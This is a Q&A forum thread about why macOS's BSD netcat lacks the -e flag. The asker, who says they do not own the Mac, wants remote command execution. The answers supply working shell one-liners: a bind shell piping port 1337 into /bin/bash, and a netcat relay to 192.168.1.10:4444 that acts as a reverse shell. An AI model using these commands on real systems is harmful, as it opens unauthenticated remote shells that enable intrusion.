# Is nc (netcat) on MacOS missing the "-e" flag?

Tags: osx, nc

When I try to run `nc -l 1337 -e /bin/bash`, it says:

```
nc: invalid option -- e
usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] 
[-p source_port] [--apple-delegate-pid pid] [--apple-delegate-uuid uuid]
      [-s source_ip_address] [-w timeout] [-X proxy_version]
      [-x proxy_address[:port]] [hostname] [port[s]]
```

I want to run commands remotely, but instead it just remotely prints text. Why is this not working and how can I fix it?

Comment: Mac OS is shipping with `a bsd variant of netcat`. I've not even found a way yet to get the version for /usr/bin/nc. But it's possible to install `gnu netcat` with i.e. [homebrew](http://brew.sh) which has this -e option. I have not found out a workaround how to get the same behaviour with the bsd nc command, or i'd add that as an answer.

Comment: Okay. I can't do that since I'm not the owner of my Mac... :(

Comment: @KeeganKuhn I don't think you have to have any administrative rights. Building from the source might also be an option. Also see  the client/server section in [Ubuntu's netcat man page](http://manpages.ubuntu.com/manpages/trusty/man1/nc_openbsd.1.html). While the version is different, the same approach should work with the FreeBSD flavour as well.

Comment: Submit that as an answer!

Answer (score 4, accepted):

You don't have to use `nc -l 1337 -e /bin/bash`. Instead, an alternative that works exactly the same is `nc -l 1337 | /bin/bash` outputs everything it receives into `/bin/bash`.

Answer (score 1):

Or try `nc target port | /bin/bash | nc target port`

Example:

```
nc 192.168.1.10 4444 | /bin/bash | nc 192.168.1.10 4444
```

It will redirect what it receives from the first `nc` to `/bin/bash` and the output from `/bin/bash` to the second `nc`. It's a work-around, but it works. :)
Otherwise just install ncat.